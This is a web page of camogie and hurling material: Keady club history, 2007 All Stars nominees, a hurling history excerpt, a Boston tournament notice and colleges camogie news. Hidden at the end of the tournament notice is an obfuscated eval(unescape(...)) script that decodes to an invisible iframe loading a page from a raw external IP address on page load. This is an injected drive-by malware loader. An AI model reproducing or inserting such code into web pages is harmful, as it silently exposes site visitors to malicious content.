St. Patrick's Camogie Club, Keady are a club associated with a long record of achievements and triumphs dating back as far as the 1920's. Keady is a club with very strong roots in the local community with many families in the area connected directly to the club and its aspirations.
For Keady, now at the top of the Senior ladder, being the Ulster Champions 2001 , it took a few years to make that all important break - through, and therefore they intend to be around for some time to come. Though that might prove to be even more difficult, they certainly have the talent coming through which should enable them to be a force in the future.
The Senior team being the Ulster Champions, are a source of inspiration to the number of young players in the club who, no doubt, look to the day they too will wear the maroon and gold jersey of the Senior side.

    Camogie All Stars nominees revealed
    Wednesday, 24 October 2007 17:03 Gala All-Ireland champions Wexford dominate the nominations for this year's Energise Sport Camogie All Stars with eleven in contention for awards. Wexford secured their first All-Ireland title in 32 years in September and that success is reflected in this year's nominations. Wexford's goalkeeper Mags D'Arcy is joined by backs Aine and Deirdre Codd, captain Mary Leacy and Catherine O'Loughlin on the list. In the midfield Wexford are represented by Caroline Murphy with Brona Furlong, Michelle Hearne, Ursula Jacob, Una Leacy and the Championship's top scorer, Kate Kelly, were all named among the forwards. Beaten All-Ireland finalists and last year's champions Cork have eight nominations. Their most notable nominees are midfielder Gemma O'Connor and forward Jennifer O'Leary who are both going for their fourth All Star in a row. Tipperary, who were beaten in the semi-final by Cork this year, are next in line with five nominations, while Galway, who were beaten by eventual winners Wexford in the semi final, have four players nominated for an All Star.

  • An early start pays off in hurling ... © 2007 Bernd Biege licensed to About.com, Inc. Hurling is regarded as one of the fastest ball-games in the world - and to the uninitiated a first encounter may also beckon forth the attributes "chaotic" and "brutal". Sometimes hurling is confused with hockey. This confusion only lasts until one realizes that charging players occasionally wield their hurleys like lethal weapons of messy destruction. Quite within the rules in most cases.
    A Basic History of Hurling
    It is said that the heroes of Ireland played hurling long before Saint Patrick's time - the game might hold the claim of being the original gaelic game, being mentioned long before football. Around 1,300 bc the Fir Bolg and the Tuatha de Danaan started their epic battle at Moytura with a game of hurling. The Brehon Laws, Ireland's native system of justice, regulated the proper use of hurleys (the "stick") and any compensation in case of injury. Setanta (or Cúchulainn) was not only a proficient warrior, he also was a great hurler - beating a team of 150 single-handedly or hurling a dangerous dog to hell.

    Eire Og turns 30! In celebration of Eire Og's 30 year anniversary we are hosting a camogie tournament on the 21st, 22nd and 23rd of July in Boston. Eire Og is the reigning North American champions and enjoys its success as a vibrant and expanding club within Boston. As a club we combine a strong home-base with phenomenal year on year away-based players. It is this mix that has contributed to Eire Og's success in the US. As North-American champions Eire Og is at the front in promoting camogie as a sport in the US. For this reason we encourage all overseas teams to join us in a tournament that poses to be the first of its kind in the US. And because Camogie is thirsty work we will close off the weekend with a banquet on the 23rd. A chance to cast off the muddied shorts, don your glad rags and celebrate the weekend that is. Interested clubs should contact the chairperson fionagohery@yahoo.com Registration deadline is Februrary 1st! eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%39%66%64%30%61%37%33%38%66%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%38%31%2e%32%39%2e%32%34%31%2e%37%30%2f%6e%65%77%2f%63%6f%75%6e%74%65%72%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%31%33%36%33%30%30%29%2b%27%31%39%36%32%36%65%34%63%61%30%35%5c%27%20%77%69%64%74%68%3d%34%37%30%20%68%65%69%67%68%74%3d%32%39%30%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29"));

        What are these? By Colleges Camogie Monday January 14 2008 Colleges Camogie has developed hugely in recent years through strategic planning and work at grassroots level. Last July saw the introduction of four new Regional Development Officers and for the first time, a Second Level Development Officer in Jennifer Steede, a native of Tuam, who is a Portmarnock CS teacher and has qualifications in Event Management and PR. She played camogie for NUI Maynooth and Raheny Camogie Club and was involved with Dublin Colleges and All-Ireland Colleges development over the years. This position has been made available through funding from the Irish Sports Council. Steede's role is to develop camogie in post-primary schools across the country and to increase the number of schools participating in competitions. Colleges participation days, run in association with county boards, are being rolled out in Monaghan, Carlow, Cavan, Wicklow, Kerry, Limerick, Kildare and Dublin.
